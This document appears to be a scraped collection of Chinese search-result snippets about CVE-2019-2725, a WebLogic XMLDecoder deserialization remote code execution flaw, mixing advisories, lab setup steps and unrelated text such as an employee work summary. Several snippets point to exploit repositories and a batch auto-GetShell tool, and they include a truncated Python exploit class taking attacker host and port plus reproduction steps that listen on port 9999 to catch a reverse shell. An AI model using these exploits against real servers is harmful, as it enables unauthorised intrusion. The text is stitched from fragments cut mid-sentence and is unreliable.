漏洞描述：CVE-2019-2725是一个Oracleweblogic反序列化远程命令执行漏洞，这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞，通过针对Oracle官网历年来的补丁构造

有关WeblogicXMLDecoder反序列化漏洞包括CVE-2017-3506、CVE-2017-10271、CVE-2019-2725、CVE-2019-2729等，其漏洞原理相似，这里首先简要介绍

春秋云镜CVE-2019-2725Weblogic<10.3.6‘wls-wsat’XMLDecoder反序列化漏洞靶标介绍OracleFusionMiddleware（子组件：WebServices）的OracleWebLogicServer组件中的漏洞。受影响的受支持版本为10.3.6.0.0和12.1.3.0.0。易于利用的漏洞允许未经身份验证的攻击者通过HTTP进行网络访问，从而破坏Ora

工作总结：从3月7号入职到9月转正，6个月期间，主要工作总结如下：1、6个月驻场运维期间，完成4次节假日紧急故障现场抢修，13次日常的中间件故障处理；完成27套信息系统的weblogic中间件的CVE-

漏洞简述2019年4月17日，CNVD发布《关于OracleWebLogicwls9-async组件存在反序列化远程命令执行漏洞的安全公告》，公告指出部分版本WebLogic中默认包含的wls9_async_response包，为WebLogicServer提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷，攻击者可以发送精心构造的恶意HTTP请求，获得目标服务器的权限，在未授权的情

与CVE-2019-2725漏洞类似。漏洞编号：CVE-2019-2725影响版本：10.3.6.0、12.1.3.0、12.2.1.3测试环境：Linux||vulhub||Weblogic

github.com/iceMatcha/CNTA-2019-0014xCVE-2019-2725/blob/master/weblogic_rce.pyhttps://github.com/pimps/CVE

一、CVE-2019-2725几种poc构造CVE-2019-2725几种poc构造看我博客链接，解压密码都是afanti_CVE-2019-2725二次反序列化jdk7u21gadgetsCVE-2019

漏洞验证POC下载：https://github.com/TopScrew/CVE-2019-2725路径kali：/POCandEXP进入脚本目录：cd/POCandEXP/weblogic/POC命令

）、任意文件上传漏洞操作（CVE-2018-2894）、XMLDecoder反序列化漏洞操作（CVE-2017-10271）、SSRF漏洞（需要安装Weblogic时选择UDDI组件）、反序列化漏洞（CVE

影响产品：OracleWebLogicServer10.3.6.0.0OracleWebLogicServer12.1.3.0.0影响组件：wls9_async_response.warwls-wsat.war本次环境：OracleWebLogicServer10.3.6.0.00x01首先判断组件是否存在1、可通过访问路径/_async/AsyncResponseServiceSoap12判断w

#-*-coding:utf-8-*-importrequestsimportargparseclassExploit:def__init__(self,rhost,lport,lhost):self.url=rhostself.lhost=lhostself.lport=lportdefrun(self):headers={'User-Agent':'Mozilla/5.0(compatible

一、漏洞简介漏洞编号和级别CVE编号：CVE-2019-2725，危险级别：高危，CVSS分值：9.8。CNVD编号：CNVD-C-2019-48814，CNVD对该漏洞的综合评级为“高危”。

搭建漏洞环境（被攻击）安装weblogic10.3.6.0关闭windows防火墙打开安装包，一直下一步，直到出现如下界面然后一直下一步安装完成后进入C:\Oracle\Middleware\user_projects\domains\base_domain，双击脚本用浏览器访问http://127.0.0.1:7001/console/login/LoginForm.jsp出现界面则搭建完成通过

一、概述2019年4月26日，Oracle发布官方公告，修复CVE-2019-2725漏洞。该漏洞属于OracleWebLogicServer中的反序列化漏洞，可导致远程代码执行。

漏洞介绍中国民生银行股份有限公司举办攻防演练发现攻击方采用488140day拿下服务器。漏洞影响Weblogic10.3.6.0Weblogic12.1.3.0Weblogic12.2.1.2Weblogic12.2.1.3复现过程1.确认漏洞存在http://www.bug1024.cn:17021/_async/AsyncResponseService2.监听自己服务器的9999端口3.反弹s

CVE-2019-2725是OracleWeblogic的一个反序列化远程代码执行漏洞，于2019年4月披露，就在公告发布后不久，SANSISCInfoSec论坛上就出现了研究报告称该漏洞被某些犯罪分子利用以安装加密货币挖矿机

主程序:K8Cscan大型内网渗透自定义扫描器https://www.cnblogs.com/k8gege/p/10519321.htmlWeblogicScan插件K8CscanMoudleWeblogicScan&Exploit目前仅支持漏洞编号CNVD-C-2019-48814该版本为探测weblogic漏洞并自动GetShell外网可当成EXP使用，也可内网自动渗透用无论内外网均可批量(填

详细分析可以看【清水川崎大佬】这篇文章：关于CVE-2019-2725/CNVD-C-2019-48814被绕过补丁的说明0x00工具说明：根据圈子大佬【白袍】发的Poc简单改造出的批量检测工具，小弟初学写的不好勿喷

请注意，虽然此警报解决的问题是反序列化漏洞，如安全警报CVE-2019-2725中所述，但它是一个明显的漏洞。由于此漏洞的严重性，Oracle建议尽

前言简单的水一篇这两天网上公布了CVE-2019-2725的补丁使用array标签+method属性来获取Class的绕过，这里简单分析一下。

WebWeblogicwls9-async反序列化远程代码执行漏洞(CVE-2019-2725)1.漏洞说明1.1描述：部分版本WebLogic中默认包含的wls9_async_response包，为WebLogicServer

4172019年4月17日，CNVD发布《关于OracleWebLogicwls9-async组件存在反序列化远程命令执行漏洞的安全公告》，公告指出部分版本WebLogic中默认包含的wls9_async_response包，为WebLogicServer提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷，攻击者可以发送精心构造的恶意HTTP请求，获得目标服务器的权限，在未授权的情况